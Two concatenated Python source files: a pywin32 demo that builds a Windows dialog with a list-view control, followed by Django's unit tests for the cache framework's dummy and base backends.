def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.iteritems():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, unicode):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error, err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except Queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print "OnSearchFinished"
def OnNotify(self, hwnd, msg, wparam, lparam):
info = win32gui_struct.UnpackNMITEMACTIVATE(lparam)
if info.code == commctrl.NM_DBLCLK:
print "Double click on item", info.iItem+1
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = Queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print "Display button selected"
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print "The selected item is", sel+1
    # These functions differ based on how the window is used, so they may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (i.e., not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
        # Create the window via CreateDialogIndirect - it can then
        # work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
        # We need to arrange for a WM_QUIT message to be sent to our
        # PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
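# Quick usage note: DemoModal() blocks inside DialogBoxIndirect until OnClose
# calls EndDialog(), while DemoCreateWindow() returns immediately and relies on
# PumpMessages() running until OnDestroy posts WM_QUIT via PostQuitMessage(0).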
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import sys
import tempfile
import threading
import time
import unittest
import warnings
from pathlib import Path
from unittest import mock, skipIf
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheHandler, CacheKeyWarning, InvalidCacheKey, cache,
caches,
)
from django.core.cache.backends.base import InvalidCacheBackendError
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.db.backends.utils import CursorWrapper
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.test.utils import CaptureQueriesContext
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango41Warning
from django.views.decorators.cache import cache_control, cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
def empty_response(request):
return HttpResponse()
KEY_ERRORS_WITH_MEMCACHED_MSG = (
'Cache key contains characters that will cause errors if used with '
'memcached: %r'
)
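# Illustrative sketch: the %r placeholder is filled with the offending key when
# the warning text is built ('key with spaces' below is an arbitrary example).
assert "'key with spaces'" in (KEY_ERRORS_WITH_MEMCACHED_MSG % 'key with spaces')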
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), True)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.decr('does_not_exist', -1)
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many(['key with spaces'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
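# Illustrative sketch of the key shape custom_key_func() produces; the key,
# prefix, and version values below are arbitrary examples.
assert custom_key_func('answer', 'prefix', 1) == 'CUSTOM-prefix-1-answer'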
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
    # `params` are test-specific overrides and `_caches_setting_base` is the
    # base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
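# Illustrative sketch: with no `base` and no `exclude`, per-call params are
# layered on top of the per-alias entries from `_caches_setting_base`, so the
# 'v2' alias keeps its VERSION while picking up the BACKEND passed in. The
# backend name here is just an example.
_example_setting = caches_setting_for_tests(
    BACKEND='django.core.cache.backends.locmem.LocMemCache',
)
assert _example_setting['v2'] == {
    'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
    'VERSION': 2,
}
del _example_setting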
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# RemovedInDjango41Warning: python-memcached doesn't support .get() with
# default.
supports_get_with_default = True
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
        # Test for cache key conflicts between caches that share a backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(
cache.has_key('null'),
True if self.supports_get_with_default else False,
)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
if self.supports_get_with_default:
self.assertIn('null', cache)
else:
self.assertNotIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
        # Don't want fields with a callable default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
        # Don't want fields with a callable default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
        # Don't want fields with a callable default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
